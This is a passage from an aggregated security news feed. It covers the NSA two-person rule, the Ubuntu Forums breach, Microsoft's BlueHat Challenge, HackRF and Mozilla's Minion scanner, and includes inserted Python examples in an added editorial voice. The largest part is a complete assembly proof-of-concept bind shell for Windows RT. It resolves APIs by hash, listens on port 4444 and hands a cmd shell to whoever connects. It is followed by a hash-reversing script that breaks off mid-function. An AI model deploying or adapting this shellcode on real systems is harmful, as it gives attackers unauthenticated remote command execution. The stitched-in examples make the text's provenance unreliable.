Buherator
Shared posts
NSA introduces a two-person rule for its system administrators
Security expert Bruce Schneier writes on his blog that, in response to the Snowden fiasco, the NSA has introduced a two-person supervision rule for its system administrators. This means that any of the agency's system administrators may access and work with key information only in the presence of another admin. Since the new rule has to be rolled out at nearly 15 thousand sites, it will take time before it is in force everywhere.
Keith Alexander, the head of the NSA, said that the server rooms where such data is stored are now locked and can only be entered in two-person teams. Alexander also said that after a test period at the NSA, these safeguards would be built in at the Pentagon and the intelligence agencies.
Details here.
Ubuntu Forums is slowly coming back
After a security incident at ubuntuforums.org, home of the Ubuntu forums, in which the names, e-mail addresses and encrypted passwords of nearly 2 million users fell into unauthorized hands, the site was taken offline. Over the past few days the team responsible for the infrastructure has been working on restoring the service. The work is nearing its end, and Canonical has released a summary of what actually happened. The report can be read here.
The forums are currently available.
Lenovo is not on the ban list after all
Bradley Manning: guilty of espionage but not aiding the enemy. But was justice served? [POLL]
Try something new – Beat the BlueHat Challenge!
We were inspired by the Matasano Crypto Challenges. So we built a similar series of fun challenges to exercise reverse engineering, vulnerability discovery, and web browser manipulation attack concepts. The Xbox team helped us develop custom Xbox Live avatar items to be awarded to anyone who completes any track of the BlueHat Challenge. Beat all three tracks for access to all three avatar items (“hacker” T-shirt, “MSRC” T-shirt, “hacker” blue hat).
The challenges are all about fun and trying new things. To sign up for any of the three tracks (reverse engineering, vulnerability discovery, design-level web browser manipulation tricks), just email us at bhchall@microsoft.com. In the subject line or in the body of the message, include either [reverse], [vulns], or [web] (or click on any of those three links). Signing up for any of the three tracks will also include instructions on participating in all tracks so you can send just one email to get started.
The Challenge is designed to appeal to a wide range of people, so if the first few sets of problems seem easy, stick with it. They’ll get harder!
More information
- There’s no restriction on who can participate, no time limit, and no way to fail.
- There is no monetary reward, and this is not a contest. Your answers should be your own work. We hope that the fun and learning you gain from completing the Challenge is reward enough. We do plan on publicly recognizing people who finish the Challenge.
- If you find this sort of thing fun, you’d probably like working at Microsoft in the Trustworthy Computing group. We solve problems like this every day and we have lots of open positions. You can see a list of our available positions at http://www.twccareers.com, and we encourage you to submit an application!
You may also be interested in the Microsoft Security Bounty Programs, which provide cash rewards for eligible individuals who identify security vulnerabilities.
A quick word from our lawyers…
By participating in the Challenge, you understand that we cannot control the incoming information you will disclose to our representatives in the course of submitting your answers in the Challenge, or what our representatives will remember about your submission. You also understand that we will not restrict work assignments of representatives who have had access to your submission. By participating in the Challenge, you agree that use of information in our representatives’ unaided memories in the development or deployment of our products or services does not create liability for us in connection with the Challenge or under copyright or trade secret law.
If you do not want to grant us these rights to your answers, please do not participate in the Challenge.
FAQ
What is the BlueHat Challenge?
The BlueHat Challenge is a series of computer security problems of increasing difficulty to help you build and test your skills in three areas: reverse engineering, vulnerability discovery, and web browser manipulation attack concepts.
How does it work?
The problems are given and reviewed over email. As you complete each level, send us your answers and we’ll send you the next set of problems.
Why is Microsoft doing this?
We hope to spur interest in computer security and help people improve their skills through a self-directed learning process. We also want to give something back to the community—we think these problems are going to be a lot of fun for you to solve. We had a lot of fun coming up with them!
How long should I expect to wait for my submitted answers to be evaluated?
The timeline for evaluating the problems will depend on the number of participants in the program, the difficulty of the problem, and the clarity of your answer. Your answers are being evaluated by real people, so please be patient with us!
How long will the program continue?
We plan to continue the program as long as there is sufficient community interest. Of course, we may change the program’s design over time as we learn what works best, and we may cancel the program at any time without notice. If there is a particular aspect of the program you like, or one track that you think is better developed than others, please let us know so we can do more of that and less of other things.
Is this the new monetary incentive/bounty program I’ve heard about?
No. This program is an educational challenge with no monetary reward. The new programs that offer monetary incentive are the Security Bounty Programs.
Where can I find information on Microsoft jobs?
Check out http://www.twccareers.com for careers in the Microsoft Trustworthy Computing group. See http://www.microsoft.com/careers for more general Microsoft career information.
If I complete the Challenge and do well, am I guaranteed an interview or a job?
No. Your completion of the Challenge or your performance will not guarantee that you will get an interview or a job, nor will it preclude you from doing so. If you are interested in careers with Microsoft Trustworthy Computing, we encourage you to visit http://www.twccareers.com, where you can submit an application for any open positions that interest you.
Acknowledgements
Many people came together to make the BlueHat Challenge possible:
- Couldn’t have happened without David Seidman’s logistics magic!
- Thanks Fred Raynal and the Quarkslab team for help with the vulnerability and RE challenges
- Thanks Manuel Caballero and Mario Heiderich for developing the web design-level challenges
- Thanks Bill Barlowe, Andrew Ciccarelli, and Shonn Gilson for the back-end infrastructure help
- Thanks Rollie Watson and John Doyle from Xbox and Rajat and Mike from Lakshya Digital
- Thanks Dan Beenfeldt, Tim Hermann, and Nanae Toyozato for the “Eli the Zombie” flash game ([reverse] level 2)
- Thanks Katie Moussouris, Mike Reavey, Leah Lease, Bruce Dang, and David Ross for inspiration
- Jonathan Ness, MSRC Engineering
NSA Director Defends Surveillance To Unsympathetic Black Hat Crowd
Read more of this story at Slashdot.
Cybercriminals Has Heroin Delivered To Brian Krebs, Then Calls Police
HackRF, or playing from 30 MHz to 6 GHz
Up on Kickstarter, [Michael Ossmann] is launching the HackRF, an inordinately cheap, exceedingly capable software defined radio tool that’s small enough to lose in your laptop bag.
The HackRF was the subject of a lot of interest last time it was on Hackaday - the ability to receive up to 6GHz allows the HackRF to do a lot of very interesting things, including listening in on Bluetooth, WiFi, and 4G networks. Also, the ability to transmit on these frequencies means a lot of very interesting, and quite possibly slightly evil applications are open to anyone with a HackRF. Like the RTL-SDR dongles, the HackRF works with GNU Radio out of the box, meaning all those cool SDR hacks we’ve seen so far will work with this new, more powerful board.
Compared to the USB TV tuner cards that were so popular a year ago, the HackRF has 10 times the bandwidth, is able to receive up to 6GHz, and is also able to transmit. It’s only half-duplex, so to receive and transmit simultaneously you’ll need two HackRFs, or maybe wait for a hardware revision that will hopefully come sooner rather than later.
Below you can check out [Michael]'s presentation at Toorcon where the HackRF was unleashed to the world.
Introducing Minion
Minion is a platform that has been under development for the past year by the Security Automation team at Mozilla to enable the integration and adoption of automated security testing.
The platform allows any team to set up the basic requirements to perform automated scanning and testing of websites and services by providing sensible defaults for plugins that enable scanning of many types of web applications and services.
With the 0.3 release of Minion there are several milestones that have been achieved that have allowed us to start using Minion internally across our development community, quality assurance, and security teams.
Architecture
Minion is intended to be a platform that is simple to use, easy to deploy, simple to extend, and flexible enough to be integrated into any development or operations workflows. At a high level there are three major components in Minion: Plugins, Task Engine, and Front End.
Minion Plugins are light-weight wrappers that perform tasks such as configuring, starting, and stopping a plan, and accept a set of callbacks to notify the caller that information is available. In order to be used, Plugins require a plugin runner that handles the invocation of the plugins as well as the results; in addition to supporting Minion’s task engine, the Minion backend repository includes command-line scripts to execute plugins. This provides support for testing during development of new plugins and allows a high degree of flexibility in how plugins are used outside of Minion.
The Task Engine is the core platform; it provides an API for managing and configuring Plans (collections of plugins and configurations), collections of users, sites and services, and the results of executions of Plans against those targets.
The Front End is a web application that provides both administration and usage of Minion; users can perform most of the configuration tasks needed to set up Minion plans, targets and users, as well as review the results of Minion scans. Being a Mozilla project, the front-end uses Persona for authentication, but all access control based decisions are built into Minion itself.
Minion Plugins
At their heart, Minion plugins are automation scripts designed to abstract away the platform, operating system, and features that an individual security tool implements, and provide a single mechanism for configuring the tool, initiating a scan, and collecting the results.
It may be helpful to look at the code for an existing plugin to better understand how they work; the AlivePlugin is a clear, simple example.
The Alive plugin is an extremely basic plugin that confirms that a host is reachable, but it implements all of the required features, and extends a BlockingPlugin. The plugin exposes some member variables that provide user interface cues (the name, links for additional information), and in this case, some built-in report objects. In the do_run method the actual logic of the scan is performed, and since no detailed setup or stopping functionality is required, the starting and stopping functionality of BlockingPlugin is sufficient.
Two base classes for plugins are provided in the Minion backend to get developers started:
- BlockingPlugin: this plugin provides the basic functionality to support a plugin that performs a task and reports its completion state at the end. This is suitable for creating straightforward plugins directly within Python.
- ExternalProcessPlugin: this plugin provides the functionality required to kick off an external tool, and provides the basis for several other extensions, especially those that wrap existing security tools.
In addition to several basic “proof of technology” plugins that collect details about targets and provide best practice information, the Minion development team is currently maintaining three other extensions:
- OWASP Zed Attack Proxy This plugin wraps the OWASP ZAP platform and enables detailed application scanning
- Skipfish a simple, but powerful web fuzzer from Google
- nmap, a port scanning tool that is generally accepted as the best in its class
Minion Task Engine
The Task Engine provides the core functionality for managing users, groups, sites, scans, and results within the Minion platform. Acting as a central hub, the Task Engine maintains a register of available plugins, provides facilities for creating and modifying plans, and managing user access to Minion, including which sites they can scan.
Plugins
Plugin deployment is one of the only features of Minion that cannot currently be managed from within the Front-End; this is a result of the configuration needed to deploy them, but the Minion Front-End provides the ability to review the available plugins, and get the class details, which is the information required to add a plugin to a Plan.
Plans
A Minion Plan is a JSON document that provides some information about what the plan does, and a sequence of tools to invoke. An example can be found below:
{
  "name": "Fuzz and Scan",
  "description": "Run Skipfish to fuzz the application, and perform a ZAP scan.",
  "workflow": [
    {
      "plugin_name": "minion.plugins.skipfish.SkipfishPlugin",
      "description": "",
      "configuration": {}
    },
    {
      "plugin_name": "minion.plugins.zap_plugin.ZAPPlugin",
      "description": "Run the ZAP Spider and Scanner",
      "configuration": { "scan": true }
    }
  ]
}
In this example, the name and description are intended to be human-readable descriptions of what the plan will do, while the workflow array contains a set of plugin names, a description that will be included in the plan details, and a set of configuration details that may be plugin specific.
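Because plans name plugins by dotted Python path and the Task Engine only runs plugins it has registered, the first thing a deployment wants is a loader that validates the document shape before anything is scheduled. The following Python is an added example and not Minion's own code: it parses the plan format shown above, rejects malformed documents, and checks the referenced plugin names against a register. The REGISTERED_PLUGINS set is a stand-in for the engine's plugin register and is my own assumption; the sample plan is the one from the page, embedded as a string.

```python
import json

# Constructed sample: the plan document from the page, embedded as a string.
SAMPLE_PLAN = """
{
  "name": "Fuzz and Scan",
  "description": "Run Skipfish to fuzz the application, and perform a ZAP scan.",
  "workflow": [
    {"plugin_name": "minion.plugins.skipfish.SkipfishPlugin",
     "description": "", "configuration": {}},
    {"plugin_name": "minion.plugins.zap_plugin.ZAPPlugin",
     "description": "Run the ZAP Spider and Scanner",
     "configuration": {"scan": true}}
  ]
}
"""

# Hypothetical plugin register, standing in for the Task Engine's list of
# deployed plugins (an assumption for this example, not Minion's data model).
REGISTERED_PLUGINS = {
    "minion.plugins.basic.AlivePlugin",
    "minion.plugins.skipfish.SkipfishPlugin",
    "minion.plugins.zap_plugin.ZAPPlugin",
}

STEP_KEYS = {"plugin_name", "description", "configuration"}


class PlanError(ValueError):
    """Raised when a plan document does not have the shape described above."""


def load_plan(text):
    """Parse a plan and return (name, description, steps); each step is a
    (plugin_name, description, configuration) tuple in workflow order."""
    try:
        doc = json.loads(text)
    except ValueError as exc:
        raise PlanError("plan is not valid JSON: %s" % exc)
    if not isinstance(doc, dict):
        raise PlanError("plan must be a JSON object")
    if not isinstance(doc.get("name"), str) or not doc["name"].strip():
        raise PlanError("plan needs a non-empty string 'name'")
    if not isinstance(doc.get("description"), str):
        raise PlanError("plan needs a string 'description'")
    workflow = doc.get("workflow")
    if not isinstance(workflow, list) or not workflow:
        raise PlanError("plan needs a non-empty 'workflow' array")
    steps = []
    for i, step in enumerate(workflow):
        if not isinstance(step, dict):
            raise PlanError("workflow[%d] must be an object" % i)
        missing = STEP_KEYS - set(step)
        if missing:
            raise PlanError("workflow[%d] is missing %s" % (i, sorted(missing)))
        name = step["plugin_name"]
        # plugin_name is a dotted Python path ("minion.plugins.<module>.<Class>");
        # accept only plain identifiers joined by dots, never arbitrary strings.
        parts = name.split(".") if isinstance(name, str) else []
        if len(parts) < 2 or not all(p.isidentifier() for p in parts):
            raise PlanError("workflow[%d] has an invalid plugin_name %r" % (i, name))
        if not isinstance(step["description"], str):
            raise PlanError("workflow[%d] description must be a string" % i)
        if not isinstance(step["configuration"], dict):
            raise PlanError("workflow[%d] configuration must be an object" % i)
        steps.append((name, step["description"], step["configuration"]))
    return doc["name"], doc["description"], steps


def unregistered_plugins(steps, registry=REGISTERED_PLUGINS):
    """Plugin names the plan references that the engine has no deployed plugin for."""
    return [name for name, _, _ in steps if name not in registry]


if __name__ == "__main__":
    plan_name, _, plan_steps = load_plan(SAMPLE_PLAN)
    print(plan_name)
    for plugin, _, conf in plan_steps:
        print(" ", plugin, conf)
    print("unregistered:", unregistered_plugins(plan_steps))
```

Validating the plugin path as identifiers-joined-by-dots matters because the engine will eventually import that string; a loader that accepts anything would let a malformed plan drive the import machinery with arbitrary text.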
Users and Invites
Minion is intended to be a team-oriented tool; as a result, the platform allows user and group management. User accounts are created through an invitation mechanism, or via the administrative interface. The invitation system allows administrators to pre-create groups, sites and plans within Minion, and then add a user to that group before the user has enrolled. Once the invite is issued, an email will be sent to the user and the user can then access a configured profile.
Groups
Groups are the mechanism by which administrators control which sites and results users have visibility into within Minion. In order for a user to be able to interact with a site via Minion, that user needs to be added to the group, and the site needs to be associated with that group. This provides extremely fine-grained control over visibility into scan results. Currently group membership allows both viewing of scans and the ability to re-execute a scan, but as the project progresses, constraints can be added to allow users to review results but not initiate scans.
Minion Front-End
Designed to be easy to use and provide instant feedback, the front-end provides access to the Minion platform. Each of the pieces of the functionality described above is accessible via the front-end, and is explicitly enabled by calling the web services exposed by the Task Engine. One of the advantages of the architecture is that the front-end can be easily re-engineered with no impact to the back-end or plugins.
Technologies
Minion is built with Python, Angular.js, and several packages that assist in ensuring a reliable end-to-end service. These technologies were selected by our development team, but the architecture and each of the service boundaries are intended to use JSON calls to permit easy integration with other services. Because of the design principles applied, it is entirely possible to implement plugins that run on any operating system or platform, and they do not need to reside on the same service. With the appropriate network configuration it is possible to deploy the front-end, task engine, and plugins on different networks, which allows users to limit the attack surface that needs to be deployed in sensitive networks.
Road Map
There are several features that are under active development, and should be implemented over the next several releases.
Authentication & Access Management
Site Ownership Verification
This is a critical feature that enables users to demonstrate ownership of a site before initiating scans.
Granular Access Control
The ability to govern users' ability to scan by group and site ownership as well as role.
Plugin Improvements
Improved Results Reporting
Minion is only as good as its plugins. Now that we have a working and reliable core platform, refinement of plugin results and improved reporting are core objectives.
Deferred Execution Plugins
Sample implementations of invoking third-party services so that we can demonstrate integrating with other Security as a Service platforms.
Reporting Plugins
Currently we have assigned risk ratings to findings based on our best practices, but that is not necessarily reflective of the priority of issues to other teams. We intend to implement a pluggable reporting interface, including the ability to add plugins to modify the risk ratings based on the security posture and priorities of the teams using Minion.
Front End
Landing Pages
Currently Minion is designed for technical users who have a need to see deep technical details. In the future, it may be desirable to generate metrics and dashboards, and to facilitate that Landing page support will be implemented to allow customization for user views.
Task Engine Improvements
Cohort
Minion is designed to support dynamic analysis via web application scanning. This is only one part of the story regarding how to perform automated security testing. Cohort is a branch of Minion that will enable analysis of source code repositories and perform static analysis.
Historical Issues
In order to facilitate ongoing tracking of a security program, support and integration for third party issue trackers (initial targets are Bugzilla and Github), and the ability to compare multiple scans over time will be implemented.
Why Minion?
The Mozilla Security team supports hundreds of websites and services, and products used by hundreds of millions of users. In addition our team supports hundreds of employees and thousands of community members that contribute to Mozilla products and services. Scaling to that level is not feasible without improving automation capabilities. While it would be much easier to solve this problem for ourselves, Mozilla’s mission is to support the open web and protect our users. By building Minion as a foundation for a security as a service platform, integrating open source and free tools, then releasing it as open source, we aim to contribute a platform that can be used by any team to dramatically improve their coverage, and integrate security testing automation in all parts of their IT operations and software development processes.
Minion is an open source project, and we welcome contributors, users, and feedback!
Finally, I would like to extend a huge thanks to Stefan Arentz, Simon Bennetts, Yeuk Hon Wong, Matthew Fuller, and all of the other developers who have moved Minion from a sheet of paper and a set of shell scripts to a production service!
Introducing App Reputation for Android Apps
McAfee has always been at the forefront of finding new ways to secure our customers against threats and risks posed by mobile devices. As part of this quest, we have introduced the concept of app reputation as part of our latest release of McAfee Mobile Security (MMS Version 3.1), released on 18th July 2013. From a consumer perspective, we have strengthened our twin features of security and privacy with app reputations in this release.
What is app reputation?
We assign a rating to an Android app based on two vectors: trust (security) and privacy (data exposure). As part of trust (security), we measure the amount of trust that could be attached to an app based on security considerations. Privacy (data exposure) reputation measures the propensity of an app to access, share and expose personal data. These reputations are based on the results of an automated analysis and are influenced by multiple factors including age, prevalence, source, etc.
How is Trust (Security) reputation different than Privacy (Data Exposure) reputation?
While the concept of security is the same for all users, risk to an individual’s privacy is appreciated differently in different cultures. Furthermore, unlike safety and security, which are intuitive to most of us, the concept of privacy is a trained behavior leading to different responses to privacy risks based on an individual’s context. At McAfee, we appreciate this and it reflects in our design. Hence the goal of privacy reputation is to provide information and avoid taking a uniform decision for all users, unlike what we do in trust reputation.
As the following screenshot indicates, we provide the data exposure score range, category score range, our observations about the app, and information related to ad libraries.
What are Notable apps?
Notable apps are those behaving outside of their category’s normal behavior. We understand that some categories of apps have a need to access more personal information than others. For example, a social media or a communication app would have a better case for accessing personal data than a calculator (productivity) app. So if a calculator app tries to access personal data normally not accessed by other apps in its category, it may be classified as a notable app.
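The category baseline described above is easy to misread as a fixed list per category; it is really a statistical norm derived from what the category's apps actually access. The following Python is an added example, not McAfee's code or scoring, that works the idea through on a constructed catalogue: it derives each category's normal data access from prevalence, computes a weighted data-exposure score and the per-category score range, and flags as notable any app whose access falls outside its category's norm. The app list, the data items and the weights are all constructed for the example.

```python
from collections import Counter, defaultdict

# Constructed sample catalogue: (app name, category, sensitive data the app accesses).
APPS = [
    ("ChatNow",   "communication", {"contacts", "location", "device_id"}),
    ("TalkBox",   "communication", {"contacts", "device_id"}),
    ("Pingr",     "communication", {"contacts", "location"}),
    ("SumFast",   "productivity",  {"device_id"}),
    ("QuickCalc", "productivity",  set()),
    ("TipCalc",   "productivity",  {"device_id"}),
    ("CalcPlus",  "productivity",  {"contacts", "location", "device_id"}),
]

# Constructed weights: how much exposure each data item represents (an assumption).
WEIGHTS = {"contacts": 3, "location": 3, "device_id": 1}


def exposure_score(data, weights=WEIGHTS):
    """Data-exposure score of one app: the weighted sum of what it accesses."""
    return sum(weights.get(item, 1) for item in data)


def category_baseline(apps, threshold=0.5):
    """Per category, the items accessed by at least `threshold` of its apps;
    this is what 'normal' access looks like for that category."""
    per_category = defaultdict(list)
    for _, category, data in apps:
        per_category[category].append(data)
    baseline = {}
    for category, datasets in per_category.items():
        counts = Counter(item for data in datasets for item in data)
        baseline[category] = {item for item, n in counts.items()
                              if n / len(datasets) >= threshold}
    return baseline


def category_score_range(apps, weights=WEIGHTS):
    """(min, max) exposure score observed within each category."""
    scores = defaultdict(list)
    for _, category, data in apps:
        scores[category].append(exposure_score(data, weights))
    return {category: (min(s), max(s)) for category, s in scores.items()}


def notable_apps(apps, threshold=0.5):
    """Apps that access data their category does not normally access, mapped to
    the unusual items. A calculator reading contacts shows up here; a chat app
    reading contacts does not, because that is normal for its category."""
    baseline = category_baseline(apps, threshold)
    notable = {}
    for name, category, data in apps:
        unusual = data - baseline[category]
        if unusual:
            notable[name] = unusual
    return notable


if __name__ == "__main__":
    print("baselines:", category_baseline(APPS))
    print("score ranges:", category_score_range(APPS))
    print("notable:", notable_apps(APPS))
```

On this catalogue, contacts are normal for communication apps but not for productivity apps, so only CalcPlus is flagged, and only for the contacts and location access, not for the device identifier that most calculators in the sample also read. The threshold is the knob that decides how widespread an access has to be before it counts as the category norm.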
This is the first blog in a series of posts on app reputation.
Google Starts Upgrading Its SSL Certificates To 2048-bit Keys
BGP multiple banking addresses hijacked, (Mon, Jul 29th)
BGP multiple banking addresses hijacked
On 24 July 2013 a significant number ...(more)...
22nd International Obfuscated C Code Contest Starts Thursday 1 Aug 2013
[local] - Novell Client 2 SP3 Privilege Escalation Exploit
[papers] - nginx Exploit Documentation About a Generic Way to Exploit Linux Targets
Ransomware tricks child sex abuse image addict into turning self in to cops
Stanford University hacked, becomes latest data breach victim
Cisco’s Acquisition of Sourcefire Highlights Need for a New Generation of Security Technology
English High Court Bans Publication of 0-Day Threat To Auto Immobilizers
Windows RT ARMv7-based Shellcode Development
; PoC ARMv7-A Windows RT Bind Shell
; Tested on: Microsoft Surface RT Tablet w/ Windows RT (6.2.9200)
; Syntax: MASM
; Notes: In order for this to work properly, you have to call this payload
; at baseaddress + 1 since it is thumb code.
; This was built with armasm.exe from Visual Studio 2012
; Author: Matthew Graeber (@mattifestation)
; License: BSD 3-Clause
AREA |.foo|, CODE, THUMB
; After linking, the resulting executable will only
; have a single section (with RX permissions) named .foo
EXPORT main
main
push {r4,lr} ; Preserve registers on the stack
bl ExecutePayload ; Execute bind shell function
pop {r4,pc} ; Restore registers on the stack and return to caller
GetProcAddress
; ARM (Thumb) implementation of the logic from the Metasploit x86 block_api shellcode
push {r1-r11,lr} ; Preserve registers on the stack
mov r9,r0 ; Save the function hash in R9
mrc p15,#0,r3,c13,c0,#2 ; R3 = &TEB
ldr r3,[r3,#0x30] ; R3 = &PEB
ldr r3,[r3,#0xC] ; R3 = PEB->Ldr
movs r6,#0 ; R6 = 0
ldr r1,[r3,#0xC] ; R1 = Ldr->InLoadOrderModuleList
ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack
cbz r4,exit_failure ; If DllBase == 0, you've likely reached the end of the module list. Return 0.
mov r10,#0xD ; R10 = ROR value (13)
mov r11,#0xD ; R11 = ROR value (13)
get_module_hash ; Improvement: Need to validate MaximumLength != 0
ldrh r5,[sp,#2] ; BaseDllName.MaximumLength
movs r2,#0 ; i = 0
cbz r5,get_export_dir ; Reached the last char of BaseDllName
ror_module_char
ldrsb r3,[r7,r2] ; R3 = (CHAR) *((PCSTR) BaseDllName.Buffer + i)
rors r0,r6,r10 ; Calculate the next portion of the module hash
cmp r3,#0x61 ; Is the character lower case?
blt notlowercase
adds r3,r3,r0 ; Add to the running hash value
subs r6,r3,#0x20 ; Convert character to upper case
b get_next_char
notlowercase
adds r6,r3,r0 ; Add to the running hash value
get_next_char
adds r2,#1 ; Move to the next character
cmp r2,r5 ; Reached the last character in the module name?
bcc ror_module_char ; If not, move on to the next character
get_export_dir
; At this point, the module hash has been calculated.
; Now begin calculating the function hash
ldr r3,[r4,#0x3C] ; IMAGE_DOS_HEADER.e_lfanew - i.e. offset to PE IMAGE_NT_HEADERS
adds r3,r3,r4 ; PIMAGE_NT_HEADERS
ldr r3,[r3,#0x78] ; IMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress (only an RVA at this point)
cbz r3,get_next_module ; Move to the next module if it doesn't have an export directory (i.e. most exe files)
adds r5,r3,r4 ; Calculate export dir virtual address
ldr r3,[r5,#0x20] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNames
ldr r7,[r5,#0x18] ; R7 = PIMAGE_EXPORT_DIRECTORY->NumberOfNames
movs r0,#0
adds r8,r3,r4 ; AddressOfNames VA
cbz r7,get_next_module ; Move on to the next module if there are no exported names
calc_func_hash
ldr r3,[r8],#4 ; R3 = Current name RVA
movs r2,#0
adds lr,r3,r4 ; lr = Current name VA
get_func_char
ldrsb r3,[lr] ; Load char from the function name
rors r2,r2,r11 ; Calculate the next portion of the function hash
adds r2,r2,r3 ; Add to the running hash value
ldrsb r3,[lr],#1 ; Peek at the next char
cmp r3,#0 ; Are you at the end of the function string?
bne get_func_char ; If not, calculate hash for the next char.
adds r3,r2,r6 ; Add the module hash to the function hash
cmp r3,r9 ; Does the calculated hash match the hash provided?
beq get_func_addr
adds r0,#1
cmp r0,r7 ; Are there more functions to process?
bcc calc_func_hash
get_next_module
ldr r1,[r1] ; LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink
movs r6,#0 ; Clear the function hash
; Improvement: The following portion is redundant
ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
cmp r4,#0 ; DllBase == 0?
str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack
bne get_module_hash
exit_failure
movs r0,#0 ; Return 0 upon failure to find a matching hash
exit_success
pop {r1-r11,pc} ; Restore stack and return to caller with the function address in R0
get_func_addr
ldr r3,[r5,#0x24] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
add r3,r3,r0,lsl #1
ldrh r2,[r3,r4] ; R2 = Ordinal table index
ldr r3,[r5,#0x1C] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
add r3,r3,r2,lsl #2
ldr r3,[r3,r4] ; Function RVA
adds r0,r3,r4 ; R0 = Function VA
b exit_success
ExecutePayload
; Improvement: None of the calls to GetProcAddress
; validate that a valid address was actually returned
; Metasploit shellcode doesn't perform this validation either. :P
push {r4-r11,lr} ; Preserve registers on the stack
subw sp,sp,#0x214 ; Allocate space on the stack for local variables
movs r3,#0x44 ; sizeof(_STARTUPINFOW)
add r2,sp,#0x38 ; R2 = &StartupInfo
movs r1,#0
init_mem1
; Improvement: I could just initialize everything on the stack to 0
strb r1,[r2],#1 ; Set current byte to 0
subs r3,#1
bne init_mem1
movs r3,#0x10 ; sizeof(_PROCESS_INFORMATION)
add r2,sp,#0x28 ; R2 = &ProcessInformation
init_mem2
strb r1,[r2],#1 ; Set current byte to 0
subs r3,#1
bne init_mem2
ldr r0,HASH_LoadLibraryA
bl GetProcAddress
mov r3,r0
adr r0,module_name ; &"ws2_32.dll"
blx r3 ; LoadLibrary("ws2_32.dll");
ldr r0,HASH_WsaStartup
bl GetProcAddress
mov r4,r0
ldr r0,HASH_WsaSocketA
bl GetProcAddress
mov r5,r0
ldr r0,HASH_Bind
bl GetProcAddress
mov r6,r0
ldr r0,HASH_Listen
bl GetProcAddress
mov r7,r0
ldr r0,HASH_Accept
bl GetProcAddress
mov r8,r0
ldr r0,HASH_CloseSocket
bl GetProcAddress
mov r9,r0
ldr r0,HASH_CreateProcess
bl GetProcAddress
mov r10,r0
ldr r0,HASH_WaitForSingleObject
bl GetProcAddress
mov r11,r0
mov r0,#0x0202
add r1,sp,#0x80
blx r4 ; WSAStartup(MAKEWORD(2, 2), &WSAData);
movs r3,#0
movs r2,#0
movs r1,#1
movs r0,#2
str r3,[sp,#4]
str r3,[sp]
blx r5 ; s = WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
movs r3,#2 ; service.sin_family = AF_INET;
strh r3,[sp,#0x18]
movs r3,#0 ; service.sin_addr.s_addr = 0;
str r3,[sp,#0x1C]
mov r3,#0x5C11 ; service.sin_port = HTONS(4444);
movs r2,#0x10
add r1,sp,#0x18
strh r3,[sp,#0x1A]
mov r5,r0 ; WSASocketA returned socket (s)
blx r6 ; Bind( s, (SOCKADDR *) &service, sizeof(service) );
movs r1,#0
mov r0,r5
blx r7 ; Listen( s, 0 );
movs r2,#0
movs r1,#0
mov r0,r5
blx r8 ; AcceptedSocket = Accept( s, 0, 0 );
mov r4,r0
mov r0,r5
blx r9 ; CloseSocket( s ); Close the original socket
mov r3,#0x101 ; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
str r3,[sp,#0x64]
movs r3,#0x44 ; StartupInfo.cb = 68;
str r3,[sp,#0x38]
add r3,sp,#0x28
str r3,[sp,#0x14]
add r3,sp,#0x38
str r3,[sp,#0x10]
movs r3,#0
str r3,[sp,#0xC]
str r3,[sp,#8]
str r3,[sp,#4]
movs r3,#1
adr r1,cmdline ; &"cmd"
str r3,[sp]
movs r3,#0
movs r2,#0
movs r0,#0
str r4,[sp,#0x78] ; StartupInfo.hStdError = (HANDLE) AcceptedSocket;
str r4,[sp,#0x74] ; StartupInfo.hStdOutput = (HANDLE) AcceptedSocket;
str r4,[sp,#0x70] ; StartupInfo.hStdInput = (HANDLE) AcceptedSocket;
blx r10 ; CreateProcessA( 0, "cmd", 0, 0, TRUE, 0, 0, 0, &StartupInfo, &ProcessInformation );
ldr r0,[sp,#0x28]
mvn r1,#0
blx r11 ; WaitForSingleObject( ProcessInformation.hProcess, INFINITE );
addw sp,sp,#0x214
pop {r4-r11,pc}
HASH_WaitForSingleObject
DCD 0x601d8708
HASH_CreateProcess
DCD 0x863fcc79
HASH_CloseSocket
DCD 0x614d6e75
HASH_Accept
DCD 0xe13bec74
HASH_Listen
DCD 0xff38e9b7
HASH_Bind
DCD 0x6737dbc2
HASH_WsaSocketA
DCD 0xe0df0fea
HASH_WsaStartup
DCD 0x006b8029
HASH_LoadLibraryA
DCD 0x0726774c
cmdline
DCB "cmd", 0x0
module_name
DCB "ws2_32.dll", 0x0
END
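The GetProcAddress routine in the listing resolves imports by hash rather than by name, which is why the payload ends in nine DCD constants instead of strings; when triaging a sample built this way, the first job is to turn those constants back into API names. The following Python is an added example and not part of the original post: it reimplements the ROR-13 hash exactly as the routine computes it (the BaseDllName buffer is UTF-16LE, MaximumLength covers the terminator, lowercase bytes are folded to upper case, and the export name is hashed up to and including its NUL) and resolves the constants from the listing against a candidate table. The candidate table is my own assumption, built from the exports named in the listing's comments plus a couple of extra kernel32 exports.

```python
# Added example: Python re-implementation of the ROR-13 hash computed by the
# GetProcAddress routine in the listing, used to map hash constants found in a
# sample back to (module, export) names during analysis.

MASK = 0xFFFFFFFF


def ror32(value, count):
    """32-bit rotate right (the rors r0,r6,r10 / rors r2,r2,r11 steps)."""
    value &= MASK
    return ((value >> count) | (value << (32 - count))) & MASK


def module_hash(dll_name):
    """Hash of LDR_DATA_TABLE_ENTRY.BaseDllName as the routine walks it: the
    buffer is UTF-16LE, so every ASCII character is followed by a zero byte;
    MaximumLength also covers the two-byte terminator; bytes in 'a'..'z' are
    folded to upper case before being added."""
    buf = dll_name.encode("utf-16-le") + b"\x00\x00"
    h = 0
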